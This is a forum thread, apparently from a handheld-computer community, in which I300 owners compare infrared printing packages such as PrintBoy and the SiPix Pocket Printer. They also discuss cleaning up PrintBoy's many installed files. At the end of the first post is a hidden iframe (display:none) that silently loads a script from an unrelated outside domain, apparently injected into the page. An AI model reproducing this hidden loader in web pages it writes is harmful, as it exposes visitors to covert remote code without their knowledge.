Question Printing packages for I300?

Has anybody had luck with a good printing package? I tried printboy, which prints via the IR port. It worked ok but doesn't support Iambic Office (which I use for word processing and spreadsheet).

I also know of IRprint and InstepPrint. Has anybody tried these, or other packages?

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have not tried any of them but am anxious to get started. Have you found anyhing? Let us know. I am awaiting a good print solution just as I am a keyboard.

SiPix Pocket Printer

I use the SiPix Pokect Printer A6 with my I300 and it works great. It prints via IR, the printer runs on AA batteries and is a thermal 400dpi printer so you only carry paper with you. The printer is about the size of a Palm III.

How much does the printer/software run? Any comments on the paper?

I saw the printer recently for $129 at Fry's here in Dallas. Paper isn't bad. It is definitely for quick print outs - directions or contact info or notes - it is like thermal fax paper. It comes with software, and is compatible with PrintBoy and a lot of other apps.

Print Boy

I tried Print Boy on a HP LaserJet with IR port.

It worked well for printing memos, address books, schedules, etc. but there were two big problems:

1) It creates a ton of files, and is very difficult to remove - All those files (mostly drivers for different printers) take a lot away from the 8mb we have to work with.

2) It doesn't print Iambic Office documents. I think it offers support for QuickSheet and QuickWord, but I far prefer the Iambic Offic Suite.

Anybody had luck with other packages? I'm going to give some other packages a shot:

and
IRPrint

steve,

in regards to your #1 issue in your post, could you use FILEZ to detect those unused print drivers and delete them? :p

I did try Filez - however PrintBoy put in SO MANY files, and they have different creators. sorting by install date didn't work because I did a backup previously, and had to restore.

Does anybody know of an unistaller program, or a program which monitors and logs which files are being installed?
